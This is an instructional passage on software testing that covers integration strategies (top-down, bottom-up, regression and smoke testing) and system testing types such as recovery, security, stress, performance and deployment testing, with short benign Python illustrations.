A neophyte in the software world might ask a seemingly legitimate question once all modules have been unit tested: “If they all work individually, why do you doubt that they'll work when we put them together?” The problem, of course, is “putting them together”—interfacing. Data can be lost across an interface; one component can have an inadvertent, adverse effect on another; subfunctions, when combined, may not produce the desired major function; individually acceptable imprecision may be magnified to unacceptable levels; global data structures can present problems. Sadly, the list goes on and on.

Integration testing is a systematic technique for constructing the software archi-

tecture while at the same time conducting tests to uncover errors associated with

interfacing. The objective is to take unit-tested components and build a program

structure that has been dictated by design.

There is often a tendency to attempt nonincremental integration; that is, to con-

struct the program using a “big bang” approach. All components are combined in

advance. The entire program is tested as a whole. And chaos usually results! A set

of errors is encountered. Correction is difficult because isolation of causes is com-

plicated by the vast expanse of the entire program. Once these errors are corrected,

new ones appear and the process continues in a seemingly endless loop.

Incremental integration is the antithesis of the big bang approach. The program

is constructed and tested in small increments, where errors are easier to isolate and

correct; interfaces are more likely to be tested completely; and a systematic test

approach may be applied. In the paragraphs that follow, a number of different incre-

mental integration strategies are discussed.

Top-down integration. Top-down integration testing is an incremental approach

to construction of the software architecture. Modules are integrated by moving

downward through the control hierarchy, beginning with the main control module


There are some situations in which you will not have the resources to do comprehensive unit testing. Select critical or complex modules and unit test only those.

Taking the "big bang" approach to integration is a lazy strategy that is doomed to failure. Integrate incrementally, testing as you go.

When you develop a project schedule, you'll have to consider the manner in which integration will occur so that components will be available when needed.


(main program). Modules subordinate (and ultimately subordinate) to the main con-

trol module are incorporated into the structure in either a depth-first or breadth-first

manner.

Referring to Figure 17.5, depth-first integration integrates all components on a

major control path of the program structure. Selection of a major path is somewhat

arbitrary and depends on application-specific characteristics. For example, selecting

the left-hand path, components M1, M2, M5 would be integrated first. Next, M8 or (if

necessary for proper functioning of M2) M6 would be integrated. Then, the central

and right-hand control paths are built. Breadth-first integration incorporates all com-

ponents directly subordinate at each level, moving across the structure horizontally.

From the figure, components M2, M3, and M4 would be integrated first. The next con-

trol level, M5, M6, and so on, follows. The integration process is performed in a series

of five steps:

1. The main control module is used as a test driver and stubs are substituted for

all components directly subordinate to the main control module.

2. Depending on the integration approach selected (i.e., depth or breadth first),

subordinate stubs are replaced one at a time with actual components.

3. Tests are conducted as each component is integrated.

4. On completion of each set of tests, another stub is replaced with the real

component.

5. Regression testing (discussed later in this section) may be conducted to

ensure that new errors have not been introduced.

The process continues from step 2 until the entire program structure is built.
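A toy sketch of this loop, under the assumption that the main control module reaches its subordinates through a lookup table so that stubs can be swapped for real components one at a time (all names are invented):

def stub(name):
    # Step 1: stubs substitute for every component directly subordinate
    # to the main control module.
    return lambda: f"{name}: stubbed"

def real_m2():
    return "M2: real result"

def real_m3():
    return "M3: real result"

subordinates = {"M2": stub("M2"), "M3": stub("M3")}

def main_control():
    # The main control module doubles as the test driver.
    return [component() for component in subordinates.values()]

def run_tests(label):
    print(label, "->", main_control())

run_tests("all stubs")
for name, component in [("M2", real_m2), ("M3", real_m3)]:
    subordinates[name] = component            # steps 2 and 4: replace a stub
    run_tests(f"after integrating {name}")    # steps 3 and 5: test + regression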


What are the steps for top-down integration?

FIGURE 17.5 Top-down integration: M1 is the main control module; M2, M3, and M4 are directly subordinate to it; M5, M6, and M7 form the next level; M8 sits at the lowest level of the left-hand path.


The top-down integration strategy verifies major control or decision points early

in the test process. In a “well-factored” program structure, decision making occurs

at upper levels in the hierarchy and is therefore encountered first. If major control

problems do exist, early recognition is essential. If depth-first integration is selected,

a complete function of the software may be implemented and demonstrated. Early

demonstration of functional capability is a confidence builder for all stakeholders.

Top-down strategy sounds relatively uncomplicated, but in practice, logistical

problems can arise. The most common of these problems occurs when processing

at low levels in the hierarchy is required to adequately test upper levels. Stubs

replace low-level modules at the beginning of top-down testing; therefore, no sig-

nificant data can flow upward in the program structure. As a tester, you are left with

three choices: (1) delay many tests until stubs are replaced with actual modules,

(2) develop stubs that perform limited functions that simulate the actual module, or

(3) integrate the software from the bottom of the hierarchy upward.

The first approach (delay tests until stubs are replaced by actual modules) can

cause you to lose some control over correspondence between specific tests and

incorporation of specific modules. This can lead to difficulty in determining the cause

of errors and tends to violate the highly constrained nature of the top-down

approach. The second approach is workable but can lead to significant overhead, as

stubs become more and more complex. The third approach, called bottom-up integration, is discussed in the paragraphs that follow.

Bottom-up integration. Bottom-up integration testing, as its name implies, begins

construction and testing with atomic modules (i.e., components at the lowest levels

in the program structure). Because components are integrated from the bottom up,

the functionality provided by components subordinate to a given level is always

available and the need for stubs is eliminated. A bottom-up integration strategy may

be implemented with the following steps:

1. Low-level components are combined into clusters (sometimes called builds)

that perform a specific software subfunction.

2. A driver (a control program for testing) is written to coordinate test case input

and output.

3. The cluster is tested.

4. Drivers are removed and clusters are combined moving upward in the

program structure.

Integration follows the pattern illustrated in Figure 17.6. Components are com-

bined to form clusters 1, 2, and 3. Each of the clusters is tested using a driver (shown

as a dashed block). Components in clusters 1 and 2 are subordinate to Ma. Drivers D1

and D2 are removed and the clusters are interfaced directly to Ma. Similarly, driver D3

for cluster 3 is removed prior to integration with module Mb. Both Ma and Mb will

ultimately be integrated with component Mc, and so forth.
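A minimal sketch of steps 1 through 3, assuming an invented cluster that parses and summarizes records; driver D1 here is throwaway test code that disappears once the cluster is interfaced to its parent module:

def parse_record(line):
    # Atomic module: turn "name, qty" into a (name, qty) pair.
    name, qty = line.split(",")
    return name.strip(), int(qty)

def total_quantity(records):
    # Atomic module: summarize the parsed records.
    return sum(qty for _, qty in records)

def cluster_subfunction(lines):
    # Step 1: low-level components combined into a cluster that performs
    # a specific subfunction (parse, then summarize).
    return total_quantity([parse_record(line) for line in lines])

def driver_d1():
    # Step 2: a driver coordinates test-case input and output.
    cases = [(["a, 1", "b, 2"], 3), ([], 0)]
    for lines, expected in cases:
        actual = cluster_subfunction(lines)     # step 3: test the cluster
        assert actual == expected, (lines, actual, expected)
    print("cluster 1 tests passed")

driver_d1()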


What problems may be encountered when top-down integration is chosen?

What are the steps for bottom-up integration?

Bottom-up integration eliminates the need for complex stubs.


As integration moves upward, the need for separate test drivers lessens. In fact,

if the top two levels of program structure are integrated top down, the number of

drivers can be reduced substantially and integration of clusters is greatly simplified.

Regression testing. Each time a new module is added as part of integration test-

ing, the software changes. New data flow paths are established, new I/O may occur,

and new control logic is invoked. These changes may cause problems with functions

that previously worked flawlessly. In the context of an integration test strategy,

regression testing is the reexecution of some subset of tests that have already been

conducted to ensure that changes have not propagated unintended side effects.

In a broader context, successful tests (of any kind) result in the discovery of errors,

and errors must be corrected. Whenever software is corrected, some aspect of the

software configuration (the program, its documentation, or the data that support it)

is changed. Regression testing helps to ensure that changes (due to testing or for

other reasons) do not introduce unintended behavior or additional errors.

Regression testing may be conducted manually, by reexecuting a subset of all test

cases or using automated capture/playback tools. Capture/playback tools enable the

software engineer to capture test cases and results for subsequent playback and

comparison. The regression test suite (the subset of tests to be executed) contains

three different classes of test cases:

• A representative sample of tests that will exercise all software functions.

• Additional tests that focus on software functions that are likely to be affected

by the change.

• Tests that focus on the software components that have been changed.


FIGURE 17.6 Bottom-up integration: components are combined into clusters 1, 2, and 3, each tested with a driver (D1, D2, D3, shown as dashed blocks). Clusters 1 and 2 are subordinate to Ma and cluster 3 to Mb; Ma and Mb are ultimately integrated with Mc.

Regression testing is an important strategy for reducing "side effects." Run regression tests every time a major change is made to the software (including the integration of new components).


As integration testing proceeds, the number of regression tests can grow quite

large. Therefore, the regression test suite should be designed to include only those

tests that address one or more classes of errors in each of the major program func-

tions. It is impractical and inefficient to reexecute every test for every program func-

tion once a change has occurred.
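One plausible way to encode these three classes is to tag each test case with metadata and select against the set of changed components; the test names and tags below are invented for illustration:

ALL_TESTS = [
    {"name": "test_login_smoke",   "functions": {"login"},   "kind": "representative"},
    {"name": "test_report_totals", "functions": {"reports"}, "kind": "representative"},
    {"name": "test_login_lockout", "functions": {"login"},   "kind": "focused"},
    {"name": "test_export_csv",    "functions": {"reports"}, "kind": "focused"},
]

def regression_suite(changed_functions):
    # Keep (1) the representative sample and (2, 3) any focused test whose
    # functions intersect the components affected by the change.
    suite = []
    for test in ALL_TESTS:
        representative = test["kind"] == "representative"
        affected = bool(test["functions"] & changed_functions)
        if representative or affected:
            suite.append(test["name"])
    return suite

print(regression_suite({"login"}))
# ['test_login_smoke', 'test_report_totals', 'test_login_lockout']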

Smoke testing. Smoke testing is an integration testing approach that is com-

monly used when product software is developed. It is designed as a pacing mecha-

nism for time-critical projects, allowing the software team to assess the project on

a frequent basis. In essence, the smoke-testing approach encompasses the follow-

ing activities:

1. Software components that have been translated into code are integrated into

a build. A build includes all data files, libraries, reusable modules, and engi-

neered components that are required to implement one or more product

functions.

2. A series of tests is designed to expose errors that will keep the build from

properly performing its function. The intent should be to uncover “show-

stopper” errors that have the highest likelihood of throwing the software

project behind schedule.

3. The build is integrated with other builds, and the entire product (in its current

form) is smoke tested daily. The integration approach may be top down or

bottom up.

The daily frequency of testing the entire product may surprise some readers. How-

ever, frequent tests give both managers and practitioners a realistic assessment of

integration testing progress. McConnell [McC96] describes the smoke test in the

following manner:

The smoke test should exercise the entire system from end to end. It does not have to be

exhaustive, but it should be capable of exposing major problems. The smoke test should

be thorough enough that if the build passes, you can assume that it is stable enough to

be tested more thoroughly.
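A daily smoke run in that spirit might be scripted as follows; the build and check commands are placeholders for a project's real entry points, not prescribed tooling:

import subprocess
import sys

def run(cmd):
    # Run one step of the smoke cycle and report success or failure.
    print("running:", " ".join(cmd))
    return subprocess.run(cmd).returncode == 0

def daily_smoke():
    # 1. Integrate the latest components into a build.
    if not run(["make", "build"]):
        sys.exit("BUILD BROKEN: fix before anything else")
    # 2. Exercise the product end to end, hunting show-stoppers only.
    if not run(["python", "smoke_checks.py"]):
        sys.exit("SMOKE TEST FAILED: the newest increment is the prime suspect")
    print("build is stable enough for deeper testing")

if __name__ == "__main__":
    daily_smoke()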

Smoke testing provides a number of benefits when it is applied on complex, time-

critical software projects:

• Integration risk is minimized. Because smoke tests are conducted daily,

incompatibilities and other show-stopper errors are uncovered early, thereby

reducing the likelihood of serious schedule impact when errors are

uncovered.

• The quality of the end product is improved. Because the approach is construc-

tion (integration) oriented, smoke testing is likely to uncover functional

errors as well as architectural and component-level design errors. If these

errors are corrected early, better product quality will result.


Smoke testing might be characterized as a rolling integration strategy. The software is rebuilt (with new components added) and smoke tested every day.

Quote: "Treat the daily build as the heartbeat of the project. If there's no heartbeat, the project is dead." (Jim McCarthy)

What benefits can be derived from smoke testing?


• Error diagnosis and correction are simplified. Like all integration testing

approaches, errors uncovered during smoke testing are likely to be associ-

ated with “new software increments”—that is, the software that has just been

added to the build(s) is a probable cause of a newly discovered error.

• Progress is easier to assess. With each passing day, more of the software has

been integrated and more has been demonstrated to work. This improves team

morale and gives managers a good indication that progress is being made.

Strategic options. There has been much discussion (e.g., [Bei84]) about the rela-

tive advantages and disadvantages of top-down versus bottom-up integration test-

ing. In general, the advantages of one strategy tend to result in disadvantages for the

other strategy. The major disadvantage of the top-down approach is the need for

stubs and the attendant testing difficulties that can be associated with them. Prob-

lems associated with stubs may be offset by the advantage of testing major control

functions early. The major disadvantage of bottom-up integration is that “the pro-

gram as an entity does not exist until the last module is added” [Mye79]. This draw-

back is tempered by easier test case design and a lack of stubs.

Selection of an integration strategy depends upon software characteristics and,

sometimes, project schedule. In general, a combined approach (sometimes called

sandwich testing) that uses top-down tests for upper levels of the program structure,

coupled with bottom-up tests for subordinate levels may be the best compromise.

As integration testing is conducted, the tester should identify critical modules. A

critical module has one or more of the following characteristics: (1) addresses several

software requirements, (2) has a high level of control (resides relatively high in the

program structure), (3) is complex or error prone, or (4) has definite performance

requirements. Critical modules should be tested as early as is possible. In addition,

regression tests should focus on critical module function.

Integration test work products. An overall plan for integration of the software

and a description of specific tests is documented in a Test Specification. This work prod-

uct incorporates a test plan and a test procedure and becomes part of the software

configuration. Testing is divided into phases and builds that address specific func-

tional and behavioral characteristics of the software. For example, integration testing

for the SafeHome security system might be divided into the following test phases:

• User interaction (command input and output, display representation, error

processing and representation)

• Sensor processing (acquisition of sensor output, determination of sensor

conditions, actions required as a consequence of conditions)

• Communications functions (ability to communicate with central monitoring

station)

• Alarm processing (tests of software actions that occur when an alarm is

encountered)


WebRef: Pointers to commentary on testing strategies can be found at www.qalinks.com.

What is a "critical module" and why should we identify it?


Each of these integration test phases delineates a broad functional category

within the software and generally can be related to a specific domain within the soft-

ware architecture. Therefore, program builds (groups of modules) are created to cor-

respond to each phase. The following criteria and corresponding tests are applied for

all test phases:

Interface integrity. Internal and external interfaces are tested as each module

(or cluster) is incorporated into the structure.

Functional validity. Tests designed to uncover functional errors are conducted.

Information content. Tests designed to uncover errors associated with local or

global data structures are conducted.

Performance. Tests designed to verify performance bounds established during

software design are conducted.

A schedule for integration, the development of overhead software, and related

topics are also discussed as part of the test plan. Start and end dates for each phase

are established and “availability windows” for unit-tested modules are defined. A

brief description of overhead software (stubs and drivers) concentrates on charac-

teristics that might require special effort. Finally, test environment and resources are

described. Unusual hardware configurations, exotic simulators, and special test

tools or techniques are a few of many topics that may also be discussed.

The detailed testing procedure that is required to accomplish the test plan is

described next. The order of integration and corresponding tests at each integration

step are described. A listing of all test cases (annotated for subsequent reference)

and expected results are also included.

A history of actual test results, problems, or peculiarities is recorded in a Test

Report that can be appended to the Test Specification, if desired. Information con-

tained in this section can be vital during software maintenance. Appropriate refer-

ences and appendixes are also presented.

Like all other elements of a software configuration, the test specification format

may be tailored to the local needs of a software engineering organization. It is impor-

tant to note, however, that an integration strategy (contained in a test plan) and test-

ing details (described in a test procedure) are essential ingredients and must appear.


What criteria should be used to design integration tests?


system testing

DEFINITION

System Testing is a level of the software testing process where a complete, integrated system/software is tested.

The purpose of this test is to evaluate the system’s compliance with the specified requirements.


• In system testing, the behavior of the whole system/product is tested as defined by the scope of the development project or product.

• It may include tests based on risks, requirement specifications, business processes, use cases, or other high-level descriptions of system behavior, interactions with the operating system, and system resources.

• System testing is most often the final test to verify that the system to be delivered meets its specification and purpose.

• System testing is carried out by specialist testers or independent testers.

• System testing should investigate both the functional and non-functional requirements of the system.

METHOD

Usually, Black Box Testing method is used.

When is it performed?

System Testing is performed after Integration Testing and before Acceptance Testing.

Who performs it?

Normally, independent Testers perform System Testing.

Definition by ISTQB

• system testing: The process of testing an integrated system to verify that it meets specified requirements.

This is a black-box type of testing in which the external behavior of the software is evaluated with the help of the requirement documents; it is based entirely on the user's point of view. This type of testing does not require knowledge of the internal design, structure, or code. It is carried out only after system integration testing is completed, and both functional and non-functional requirements are verified.

In integration testing, testers concentrate on finding bugs/defects in the integrated modules. In system testing, testers concentrate on finding bugs/defects based on the behavior of the software application, the software design, and the expectations of the end user.

Why system testing is important:

a) In the software development life cycle, system testing is the first level of testing at which the system is tested as a whole.


b) This step checks whether the system meets its functional requirements.

c) System testing enables you to test, validate, and verify both the application architecture and the business requirements.

d) The application/system is tested in an environment that closely resembles the production environment where the software will finally be deployed.

Generally, a separate and dedicated team is responsible for system testing, and it is performed on a staging server that is similar to the production server. This means the software application is tested under conditions that closely match the production environment.

#1. It is very important to complete a full test cycle, and system testing is the stage where this is done.

#2. System testing is performed in an environment similar to the production environment, and hence stakeholders can get a good idea of the users' reaction.

#3. It helps to minimize after-deployment troubleshooting and support calls.

#4. In this STLC stage, both the application architecture and the business requirements are tested.

Different hierarchical levels of testing:

As with almost any technical process, software testing has a prescribed order in which things should be done. Different levels of testing are used in the testing process; each level of testing aims to test different aspects of the system. The following lists the software testing categories in sequential order.


Focus criteria for System Testing:

System testing mainly focuses on the following:

1. External interfaces
2. Multiprogram and complex functionalities
3. Security
4. Recovery
5. Performance
6. Operator and user's smooth interaction with the system
7. Installability
8. Documentation
9. Usability
10. Load / Stress

Entry Criteria for System Testing:

• Unit testing should be finished.
• Modules should be fully integrated.
• Software development should be complete, as per the specification document.
• The testing environment should be available for testing (similar to the staging environment).

How to do System Testing?

The following steps are important to perform system testing:

Step 1: Create a system test plan
Step 2: Create test cases
Step 3: Carefully build the data used as input for system testing
Step 4: If applicable, create scripts to build the environment and to automate execution of test cases
Step 5: Execute the test cases
Step 6: Fix the bugs, if any, and retest the code
Step 7: Repeat the test cycle as necessary

In software system testing, the following steps need to be executed:

Step 1) The first and most important step is preparation of the system test plan:

The points to be covered in a system test plan may vary from organization to organization, as well as with the project plan, test strategy, and master test plan.

Nevertheless, here is a list of standard points to consider while creating a system test plan:

• Goals & Objectives


• Scope
• Critical areas to focus on
• Test deliverables
• Testing strategy for system testing
• Testing schedule
• Entry and exit criteria
• Suspension & resumption criteria for system testing
• Test environment
• Roles and responsibilities
• Glossary

Step 2) The second step is creation of test cases:

This is very similar to writing functional test cases. In test case writing you should cover the test scenarios & use cases.

Here you should consider different types of testing, such as functional testing, regression testing, smoke testing, sanity testing, ad-hoc testing, exploratory testing, usability testing, GUI software testing, compatibility testing, performance testing, load testing, stress testing, volume testing, error handling testing, scalability testing, security testing, capacity testing, installation testing, recovery testing, reliability testing, accessibility testing, etc.

While writing test cases, you need to check whether the test cases cover all functional, non-functional, technical, and UI requirements.

Sample Test Case Format:
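A representative layout (these field names are common practice, not a prescribed standard) is:

• Test Case ID (e.g., TC_ST_001)
• Test Title / Description
• Preconditions
• Test Steps
• Test Data
• Expected Result
• Actual Result
• Status (Pass/Fail)
• Remarks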

Step 3) Creation of the test data used for system testing.

Step 4) Automated test case execution.

Step 5) Execution of manual test cases, with the test cases updated in the test management tool (if any).

Step 6) Bug reporting, bug verification & regression testing.

Step 7) Repeat the testing life cycle (if required).


What is a ‘System Test Plan’?

As you may have read in the other articles in the testing series, this document typically describes the following:
- The testing goals
- The key areas to be focused on while testing
- The testing deliverables
- How the tests will be carried out
- The list of things to be tested
- Roles and responsibilities
- Prerequisites to begin testing
- Test environment
- Assumptions
- What to do after a test is successfully carried out
- What to do if a test fails
- Glossary

Types of System Testing:

System testing is called a superset of all types of testing, as all the major types of testing are covered in it, although the focus on specific types may vary on the basis of the product, organizational processes, timeline, and requirements.

Installation Testing: To make sure that the product/software can be installed on the specified or supported systems, can be configured, and can be brought into an operational mode.

Functionality Testing: To make sure that the functionality of the product works as per the defined requirements, within the capabilities of the system.


Recoverability Testing: To check how well the system recovers from various input errors and other failure situations.

Interoperability Testing: To check whether the system can operate well with third-party products.

Performance Testing: To verify the system's performance under various conditions, in terms of its performance characteristics.

Scalability Testing: To verify the system's scaling abilities in various terms, such as user scaling, geographic scaling, and resource scaling.

Reliability Testing: To verify that the system can be operated for long durations without developing failures.

Regression Testing: To verify the system's stability as it passes through the integration of different subsystems and maintenance tasks.

Documentation Testing: To verify that the system's user guide and other help-topic documents are correct and usable.

Security Testing: To verify that the system does not allow unauthorized access to data and resources.

Usability Testing: To verify that the system is easy to use, learn, and operate.

Example Test Scenarios

System testing sample test scenarios for an eCommerce Site:

1. Whether the site launches properly, with all the relevant pages, features, and logos

2. Whether the user can register and log in to the site

3. Whether the user can see the available products, add products to the cart, make a payment, and get confirmation via e-mail, SMS, or call

4. Whether major functionality such as searching, filtering, sorting, adding, changing, and wish lists works as expected

5. Whether the number of users defined in the requirements document can access the site simultaneously

6. Whether the site launches properly in all major browsers and their latest versions

7. Whether transactions done on the site by a given user are sufficiently secure

8. Whether the site launches properly on all the supported platforms, such as Windows, Linux, and mobile

9. Whether the user manual/guide, return policy, privacy policy, and terms of use are available as separate documents and are useful to any newbie or first-time user

10. Whether the content of pages is properly aligned, well managed, and free of spelling mistakes

11. Whether session timeout is implemented and working as expected

12. Whether the user is satisfied after using the site; in other words, whether the user does not find the site difficult to use
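As an illustration, scenario 11 (session timeout) could be automated along the following lines. The Session class below fakes the site's behavior so the sketch is self-contained; a real system test would drive the staging site itself, and the timeout value is an assumed requirement.

import time

SESSION_TIMEOUT_SECONDS = 2  # assumed requirement value

class Session:
    # Stand-in for the site's session handling.
    def __init__(self):
        self.last_activity = time.time()

    def request(self, path):
        if time.time() - self.last_activity > SESSION_TIMEOUT_SECONDS:
            return 401  # expired: the user must log in again
        self.last_activity = time.time()
        return 200

def test_session_times_out_when_idle():
    session = Session()
    assert session.request("/cart") == 200      # active session works
    time.sleep(SESSION_TIMEOUT_SECONDS + 1)     # stay idle past the limit
    assert session.request("/cart") == 401      # expired session rejected

test_session_times_out_when_idle()
print("session timeout behaves as expected")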

How to perform System Testing?

System testing is a fundamental part of software testing, and the test plan should always allocate specific space for it.

To test the system as a whole, requirements and expectations should be clear, and the tester needs to understand the real-time usage of the application too.

Also, the most commonly used third-party tools, OS versions, and OS flavors and architectures can affect the system's functionality, performance, security, recoverability, or installability.

Therefore, while testing the system, a clear picture of how the application is going to be used and what kinds of issues it can face in real time is helpful. In addition, the requirements document is as important as understanding the application.

A clear and up-to-date requirements document can save the tester from numerous misunderstandings, assumptions, and questions.

In short, a pointed and crisp requirements document with the latest updates, along with an understanding of real-time application usage, can make system testing more fruitful.

What do you verify in System Testing?

System testing involves testing the software code for the following:

• Testing the fully integrated application, including external peripherals, to check how components interact with one another and with the system as a whole. This is also called end-to-end scenario testing.

• Thorough verification of every input in the application to check for the desired outputs.


• Testing of the user's experience with the application.

What Types of System Testing Should Testers Use?

Working towards Effective Systems Testing:

There are various factors that affect the success of system testing:

1) Test Coverage: System Testing will be effective only to the extent of the coverage of Test Cases. What is Test coverage? Adequate Test coverage implies the scenarios covered by the test cases are sufficient. The Test cases should “cover” all scenarios, use cases, Business Requirements, Technical Requirements, and Performance Requirements. The test cases should enable us to verify and validate that the system/application meets the project goals and specifications.

2) Defect Tracking: The defects found during the process of testing should be tracked. Subsequent iterations of test cases verify if the defects have been fixed.

3) Test Execution: The Test cases should be executed in the manner specified. Failure to do so results in improper Test Results.


4) Build Process Automation: A lot of errors occur due to an improper build. A 'build' is a compilation of the various components that make up the application, deployed in the appropriate environment. The test results will not be accurate if the application is not built correctly or if the environment is not set up as specified. Automating this process may help reduce manual errors.

5) Test Automation: Automating the Test process could help us in many ways:

a. The test can be repeated with fewer errors of omission or oversight

b. Some scenarios can be simulated if the tests are automated, for instance simulating a large number of users or increasingly large amounts of input/output data

6) Documentation: Proper documentation helps keep track of the tests executed. It also helps create a knowledge base for current and future projects. Appropriate metrics/statistics can be captured to validate or verify the efficiency of the technical design/architecture.


17.7 SYSTEM TESTING

At the beginning of this book, I stressed the fact that software is only one element of

a larger computer-based system. Ultimately, software is incorporated with other sys-

tem elements (e.g., hardware, people, information), and a series of system integra-

tion and validation tests are conducted. These tests fall outside the scope of the

software process and are not conducted solely by software engineers. However,

steps taken during software design and testing can greatly improve the probability

of successful software integration in the larger system.

A classic system-testing problem is “finger pointing.” This occurs when an error

is uncovered, and the developers of different system elements blame each other for

the problem. Rather than indulging in such nonsense, you should anticipate poten-

tial interfacing problems and (1) design error-handling paths that test all information

coming from other elements of the system, (2) conduct a series of tests that simulate

bad data or other potential errors at the software interface, (3) record the results of

tests to use as “evidence” if finger pointing does occur, and (4) participate in plan-

ning and design of system tests to ensure that software is adequately tested.

System testing is actually a series of different tests whose primary purpose is to

fully exercise the computer-based system. Although each test has a different pur-

pose, all work to verify that system elements have been properly integrated and per-

form allocated functions. In the sections that follow, I discuss the types of system

tests that are worthwhile for software-based systems.

17.7.1 Recovery Testing

Many computer-based systems must recover from faults and resume processing

with little or no downtime. In some cases, a system must be fault tolerant; that is,

processing faults must not cause overall system function to cease. In other cases, a

system failure must be corrected within a specified period of time or severe eco-

nomic damage will occur.

Recovery testing is a system test that forces the software to fail in a variety of ways

and verifies that recovery is properly performed. If recovery is automatic (performed

by the system itself), reinitialization, checkpointing mechanisms, data recovery, and

restart are evaluated for correctness. If recovery requires human intervention, the

mean-time-to-repair (MTTR) is evaluated to determine whether it is within accept-

able limits.
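A self-contained sketch of testing automatic recovery, using an invented checkpoint file and an injected fault: the "system" is forced to fail mid-run, and the test then verifies that a restart resumes from the last checkpoint rather than starting over.

import json
import os

CHECKPOINT = "checkpoint.json"

def process(items, fail_at=None):
    start = 0
    if os.path.exists(CHECKPOINT):                     # reinitialization
        start = json.load(open(CHECKPOINT))["next"]
    for i in range(start, len(items)):
        if fail_at == i:
            raise RuntimeError("injected fault")       # forced failure
        json.dump({"next": i + 1}, open(CHECKPOINT, "w"))  # checkpointing
    return "done"

items = list(range(10))
try:
    process(items, fail_at=7)
except RuntimeError:
    pass                                               # the crash is expected
assert process(items) == "done"                        # restart must recover
assert json.load(open(CHECKPOINT))["next"] == len(items)
os.remove(CHECKPOINT)
print("recovery verified: restart resumed from the checkpoint")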

17.7.2 Security Testing

Any computer-based system that manages sensitive information or causes actions

that can improperly harm (or benefit) individuals is a target for improper or illegal

penetration. Penetration spans a broad range of activities: hackers who attempt to

penetrate systems for sport, disgruntled employees who attempt to penetrate for

revenge, dishonest individuals who attempt to penetrate for illicit personal gain.


Quote: "Like death and taxes, testing is both unpleasant and inevitable." (Ed Yourdon)


Security testing attempts to verify that protection mechanisms built into a system

will, in fact, protect it from improper penetration. To quote Beizer [Bei84]: “The sys-

tem’s security must, of course, be tested for invulnerability from frontal attack—but

must also be tested for invulnerability from flank or rear attack.”

During security testing, the tester plays the role(s) of the individual who desires to

penetrate the system. Anything goes! The tester may attempt to acquire passwords

through external clerical means; may attack the system with custom software

designed to break down any defenses that have been constructed; may overwhelm

the system, thereby denying service to others; may purposely cause system errors,

hoping to penetrate during recovery; may browse through insecure data, hoping to

find the key to system entry.

Given enough time and resources, good security testing will ultimately penetrate

a system. The role of the system designer is to make penetration cost more than the

value of the information that will be obtained.

17.7.3 Stress Testing

Earlier software testing steps resulted in thorough evaluation of normal program

functions and performance. Stress tests are designed to confront programs with

abnormal situations. In essence, the tester who performs stress testing asks: “How

high can we crank this up before it fails?”

Stress testing executes a system in a manner that demands resources in abnor-

mal quantity, frequency, or volume. For example, (1) special tests may be designed

that generate ten interrupts per second, when one or two is the average rate,

(2) input data rates may be increased by an order of magnitude to determine how

input functions will respond, (3) test cases that require maximum memory or other

resources are executed, (4) test cases that may cause thrashing in a virtual oper-

ating system are designed, (5) test cases that may cause excessive hunting for

disk-resident data are created. Essentially, the tester attempts to break the

program.
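A minimal stress-test sketch, assuming an invented service function as the unit under stress; a real test would call the deployed system's interface at an abnormal request rate and watch how it degrades:

import collections
import concurrent.futures

def service(request_id):
    # Stand-in for the component under stress; here every thousandth
    # request simulates an overload failure.
    if request_id % 1000 == 999:
        raise TimeoutError("overloaded")
    return "ok"

def stress(total_requests=5000, workers=50):
    # Drive the component with far more concurrent requests than its
    # nominal load and tally how it responds.
    outcomes = collections.Counter()
    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(service, i) for i in range(total_requests)]
        for future in futures:
            try:
                outcomes[future.result()] += 1
            except TimeoutError:
                outcomes["timeout"] += 1
    return outcomes

print(stress())  # e.g., Counter({'ok': 4995, 'timeout': 5})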

A variation of stress testing is a technique called sensitivity testing. In some situa-

tions (the most common occur in mathematical algorithms), a very small range of

data contained within the bounds of valid data for a program may cause extreme and

even erroneous processing or profound performance degradation. Sensitivity testing

attempts to uncover data combinations within valid input classes that may cause

instability or improper processing.

17.7.4 Performance Testing

For real-time and embedded systems, software that provides required function but

does not conform to performance requirements is unacceptable. Performance test-

ing is designed to test the run-time performance of software within the context of an

integrated system. Performance testing occurs throughout all steps in the testing

process. Even at the unit level, the performance of an individual module may be


Quote: "If you're trying to find true system bugs and you haven't subjected your software to a real stress test, then it's high time you started." (Boris Beizer)


assessed as tests are conducted. However, it is not until all system elements are fully

integrated that the true performance of a system can be ascertained.

Performance tests are often coupled with stress testing and usually require both

hardware and software instrumentation. That is, it is often necessary to measure

resource utilization (e.g., processor cycles) in an exacting fashion. External instru-

mentation can monitor execution intervals, log events (e.g., interrupts) as they oc-

cur, and sample machine states on a regular basis. By instrumenting a system, the

tester can uncover situations that lead to degradation and possible system failure.
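On the software side alone, lightweight instrumentation can be sketched as a timing wrapper that records each execution interval and then summarizes the samples to spot degradation; the measured operation here is a stand-in:

import functools
import statistics
import time

def instrumented(fn):
    # Wrap an operation so every call appends its execution interval
    # to a sample list attached to the wrapper.
    samples = []
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        try:
            return fn(*args, **kwargs)
        finally:
            samples.append(time.perf_counter() - start)
    wrapper.samples = samples
    return wrapper

@instrumented
def handle_event(n):
    # Stand-in for the operation being measured.
    return sum(i * i for i in range(n))

for size in [1000, 2000, 4000, 8000]:
    handle_event(size)

s = handle_event.samples
print(f"calls={len(s)} mean={statistics.mean(s):.6f}s max={max(s):.6f}s")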

17.7.5 Deployment Testing

In many cases, software must execute on a variety of platforms and under more

than one operating system environment. Deployment testing, sometimes called

configuration testing, exercises the software in each environment in which it is to

operate. In addition, deployment testing examines all installation procedures and

specialized installation software (e.g., “installers”) that will be used by customers,

and all documentation that will be used to introduce the software to end users.

As an example, consider the Internet-accessible version of SafeHome software

that would allow a customer to monitor the security system from remote locations.

The SafeHome WebApp must be tested using all Web browsers that are likely to be

encountered. A more thorough deployment test might encompass combinations

of Web browsers with various operating systems (e.g., Linux, Mac OS, Windows).

Because security is a major issue, a complete set of security tests would be integrated

with the deployment test.
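The browser-by-OS matrix suggested by the SafeHome example can be sketched as a simple cross-product check; launches_cleanly is a placeholder for a real install-and-launch harness:

import itertools

BROWSERS = ["Firefox", "Chrome", "Safari"]
PLATFORMS = ["Linux", "Mac OS", "Windows"]

def launches_cleanly(browser, platform):
    # Placeholder: a real harness would install and start the WebApp in
    # this environment and run the deployment (and security) checks.
    return True

# Exercise the software in each environment in which it is to operate.
failures = [(b, p) for b, p in itertools.product(BROWSERS, PLATFORMS)
            if not launches_cleanly(b, p)]
for b, p in itertools.product(BROWSERS, PLATFORMS):
    status = "FAIL" if (b, p) in failures else "PASS"
    print(f"{b} on {p}: {status}")
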